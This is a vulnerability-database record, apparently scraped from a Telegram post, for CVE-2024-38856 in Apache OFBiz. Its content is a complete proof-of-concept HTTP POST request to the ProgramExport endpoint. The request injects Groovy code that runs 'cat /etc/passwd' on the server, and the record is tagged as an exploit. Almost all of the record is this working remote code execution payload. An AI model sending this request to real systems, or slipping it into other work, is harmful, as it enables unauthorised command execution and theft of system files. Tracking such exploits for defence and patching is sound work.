{"uuid": "d5afae69-b8cb-48e9-9c9f-e43469016ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2953", "content": "Apache OFBiz CVE-2024-38856\n\nPOST /webtools/control/main/ProgramExport HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 68\n\ngroovyProgram=throw new Exception('cat /etc/passwd'.execute().text);\n\n#exploit #poc", "creation_timestamp": "2024-08-06T09:58:15.000000Z"}